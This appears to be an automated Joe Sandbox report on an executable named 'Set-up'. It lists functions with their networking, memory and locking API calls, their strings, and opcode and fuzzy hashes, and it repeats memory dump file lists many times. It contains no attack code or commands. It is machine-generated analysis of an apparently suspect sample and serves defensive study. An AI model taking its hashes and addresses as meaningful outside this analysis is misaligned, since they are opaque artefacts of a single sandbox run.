Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: __acrt_iob_func_errnofflush
String ID: LIMIT %s:%d %s reached memlimit$MEM %s:%d malloc(%zu) = %p$malloc
API String ID: 4185500129-2082484552
Opcode ID: 9b5df7b101ae2568e4867365ed695614df2f59fc4f4bd1db3dcba62d29f7e023
Instruction ID: 0ccc11313af1baa2656784e0df472181587ca42b62ccef0b538665bd4ec87ecd
Opcode Fuzzy Hash: 9b5df7b101ae2568e4867365ed695614df2f59fc4f4bd1db3dcba62d29f7e023
Instruction Fuzzy Hash: 8B11E6F5A04349ABD620EF55EC8AF1777ACEB80B48F15052CFC6482241FB31E9148771

Function 00C9D5E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42networklibraryloaderCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202), ref: 00C9D65A

Part of subcall function 00C9D690: GetModuleHandleA.KERNEL32(kernel32,00000000,?,?,?,00C9D5FA,iphlpapi.dll), ref: 00C9D699
Part of subcall function 00C9D690: GetProcAddress.KERNEL32(00000000,LoadLibraryExA), ref: 00C9D6B5
Part of subcall function 00C9D690: strpbrk.API-MS-WIN-CRT-STRING-L1-1-0(?,011FBEB4,?,?,00C9D5FA,iphlpapi.dll), ref: 00C9D6C3

GetProcAddress.KERNEL32(00000000,if_nametoindex), ref: 00C9D60C
QueryPerformanceFrequency.KERNEL32(0134B070), ref: 00C9D643
WSACleanup.WS2_32 ref: 00C9D67C

Strings

iphlpapi.dll, xrefs: 00C9D5F0
if_nametoindex, xrefs: 00C9D606

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: AddressProc$CleanupFrequencyHandleModulePerformanceQueryStartupstrpbrk
String ID: if_nametoindex$iphlpapi.dll
API String ID: 3452087986-3097795196
Opcode ID: 9c2920f8ecad5ff4c7fc95327f25053ddac07ab6057b52fb8ac44e1ce7e9874a
Instruction ID: cde57fb3fe1e6bce9bd6208f8945cf28540a6d36649a6c47d3afd805d805a868
Opcode Fuzzy Hash: 9c2920f8ecad5ff4c7fc95327f25053ddac07ab6057b52fb8ac44e1ce7e9874a
Instruction Fuzzy Hash: E50147B4A003404BEB206F3CE90F36576A86B51304F48092CF879D119BFB38C288C352

Function 00D34950 Relevance: 6.2, APIs: 4, Instructions: 167networkstringCOMMON

Download Yara Rule

APIs

htonl.WS2_32(7F000001), ref: 00D34A21
gethostname.WS2_32(00000000,00000040), ref: 00D34AA4
WSAGetLastError.WS2_32 ref: 00D34AB3
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000002E), ref: 00D34B3F

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: ErrorLastgethostnamehtonlstrchr
String ID:
API String ID: 655544046-0
Opcode ID: 7606994889f32bb3149ad9f8d137e27c074f9bec932530826146f6de14dcd2e5
Instruction ID: e2f1676362069da979c0356d5979a0ccdae32291a6fee3eb2a99ff62a4095ae5
Opcode Fuzzy Hash: 7606994889f32bb3149ad9f8d137e27c074f9bec932530826146f6de14dcd2e5
Instruction Fuzzy Hash: 93519EB16047008BE7309F69DD49723B6E8EF45319F18093DE99A866D1E779F884CB32

Function 011562C0 Relevance: 4.5, APIs: 3, Instructions: 34COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00C82690), ref: 011562CB
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 01156337
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0115633C

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: _errnofreemalloc
String ID:
API String ID: 1571115353-0
Opcode ID: 56382f2d5ded4cc71fc9da181e118012166866603733834567a189bf61e2665c
Instruction ID: 23405769e5e3789b6c509bf4f5ab864b3e331aa3db4a69904227821f495a1a9e
Opcode Fuzzy Hash: 56382f2d5ded4cc71fc9da181e118012166866603733834567a189bf61e2665c
Instruction Fuzzy Hash: 9701C9B0504301CBEB89AF69C58431A7AE5AF50304F948469CC988F38ADB79C454CBE2

Function 00C83AB0 Relevance: 4.5, APIs: 3, Instructions: 21COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(0134B044,00C8208F), ref: 00C83AB5
ReleaseSRWLockExclusive.KERNEL32(0134B044,0134B044,00C8208F), ref: 00C83AD0
ReleaseSRWLockExclusive.KERNEL32(0134B044), ref: 00C83B02

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: ExclusiveLock$Release$Acquire
String ID:
API String ID: 1021914862-0
Opcode ID: 6403a4effe905ca7df4fd7d377761d48bc8502ab0b09228b77260f61f2e3c2b6
Instruction ID: 86de2eb842418c6963f240996eced72db0a21f942eccde8ae7f698aee03ca50c
Opcode Fuzzy Hash: 6403a4effe905ca7df4fd7d377761d48bc8502ab0b09228b77260f61f2e3c2b6
Instruction Fuzzy Hash: D2E08C28A002438FEB317BA5A80364DA2987B20B4EF844428A165A025DEF3CF9046722

Function 00C878B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

closesocket.WS2_32(?), ref: 00C878BB

Part of subcall function 00C872A0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,000003FF), ref: 00C872F6

Strings

FD %s:%d sclose(%d), xrefs: 00C878CB

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: closesocketfwrite
String ID: FD %s:%d sclose(%d)
API String ID: 1967222983-3116021458
Opcode ID: 01c045cff7c121d60343df63b0804b00eb6ac593c604f79043ea3d41d417d995
Instruction ID: 25b3530ef8e3151e6b32b4897f8be6aedeba79d22a44023607b3992037394038
Opcode Fuzzy Hash: 01c045cff7c121d60343df63b0804b00eb6ac593c604f79043ea3d41d417d995
Instruction Fuzzy Hash: C2D05E32A092606BC6206A59BC48C5BBBA8DEC6F61B09096DF95077204E220DC0197E2

Function 00D371C0 Relevance: 3.3, APIs: 2, Instructions: 342COMMON

Download Yara Rule

APIs

_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00D372FE

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: _stricmp
String ID:
API String ID: 2884411883-0
Opcode ID: 3eaaf8f48c2090f33216c2d3cdc4b471262ab83889dd785a8b0ff9e63d67d911
Instruction ID: c9e5fae3fd37da10fcf675f27af75c2f507d5d50ed4338112115f25c193fe58f
Opcode Fuzzy Hash: 3eaaf8f48c2090f33216c2d3cdc4b471262ab83889dd785a8b0ff9e63d67d911
Instruction Fuzzy Hash: 60C185F6908700ABEB20AF14DC86B6B77A9EF44308F480468FD8957252E771ED54D7B2

Function 0115B690 Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,0115B74F), ref: 0115B6B9
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,0115B74F), ref: 0115B6DC

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: _errnorealloc
String ID:
API String ID: 3650671883-0
Opcode ID: 29c12d94e65f4e03f78a35d363a7cd252d5dea5636832e5bb0c63ad37cb340b7
Instruction ID: 4ecf8d128146dcc9b4b03dce6f68debd08e00774ada1d029ff26be913950c32d
Opcode Fuzzy Hash: 29c12d94e65f4e03f78a35d363a7cd252d5dea5636832e5bb0c63ad37cb340b7
Instruction Fuzzy Hash: D3F09071508512CFCB549F2CC880059B7E6BF05324B6A8756EC34CB2E5E730D881CBB6

Function 00E5CA40 Relevance: 2.6, APIs: 2, Instructions: 63COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,00DFD471,00000050,crypto/bio/bio_lib.c,00000053,?,?,?,00DFD52B,00000000,00C81A70,00E048ED,0125909C), ref: 00E5CA8C
memset.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,00000000,00C81A70), ref: 00E5CA9E

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: mallocmemset
String ID:
API String ID: 2882185209-0
Opcode ID: 78dae41076160ff7330b773045edf66e3d4a58d0c239a779a9c7b0efeceaf005
Instruction ID: 3396cce10ccb2ae2b9ef475eac50f0658b5cf805237c60e42721b027b7a9e0f0
Opcode Fuzzy Hash: 78dae41076160ff7330b773045edf66e3d4a58d0c239a779a9c7b0efeceaf005
Instruction Fuzzy Hash: 7101D2D6B053452BE631E5756C85B5B2F8C9B9171AF282835FD41F6283E641D84C82A2

Function 01156A70 Relevance: 2.5, APIs: 2, Instructions: 40COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,01156431), ref: 01156AB3

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 4fff40c35b4763ceba2ae390be91be56c12f2d9607a51bca9d4d3afd4392a104
Instruction ID: a924a90d906e661a74eddf5602a5ba6c21feaa62cefeb43900765fc2dcf9f328
Opcode Fuzzy Hash: 4fff40c35b4763ceba2ae390be91be56c12f2d9607a51bca9d4d3afd4392a104
Instruction Fuzzy Hash: 9501A8B4604701CBEB99AF7DC4C452A77E0BF55204F85885ADCA5CB346D774D890CB92

Function 00D4AF70 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

getsockname.WS2_32(?,?,00000080), ref: 00D4AFD0

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: getsockname
String ID:
API String ID: 3358416759-0
Opcode ID: d450b055e4368b37f7ffb5d2be2184a4c2d02d7e6687cfcde41196b31e359a1e
Instruction ID: 851284d3978fd0705f1c5278d5e94fa5e307efc5e0e7ab5e7bec322d68863deb
Opcode Fuzzy Hash: d450b055e4368b37f7ffb5d2be2184a4c2d02d7e6687cfcde41196b31e359a1e
Instruction Fuzzy Hash: AA11967084878496EB268F1CD4027E6B3F8EFD0329F149619F9D942150F73299C5CBD2

Function 00D4A920 Relevance: 1.5, APIs: 1, Instructions: 43networkCOMMON

Download Yara Rule

APIs

send.WS2_32(?,?,?,00000000), ref: 00D4A97E

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: c0bf07ae8749f67353e34353acd13cc62ea8371024093dd88e2be445575ae3cd
Instruction ID: 785db2eb8ed20f7381da3af94a481ad44ece408e350e43bf6bb8668d752ac674
Opcode Fuzzy Hash: c0bf07ae8749f67353e34353acd13cc62ea8371024093dd88e2be445575ae3cd
Instruction Fuzzy Hash: 1F01A275B00710AFC7248F19DC45B56BBA5EF84B21F0A825DFA986B361C331AC148FE1

Function 00D4A870 Relevance: 1.5, APIs: 1, Instructions: 32networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(000000FF,00D36F4E,000000FF,00000000), ref: 00D4A8AF

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 7c03aa6a55b1c149fc127b160820a88595bfc8582fa404d0bf537cf4087c10c7
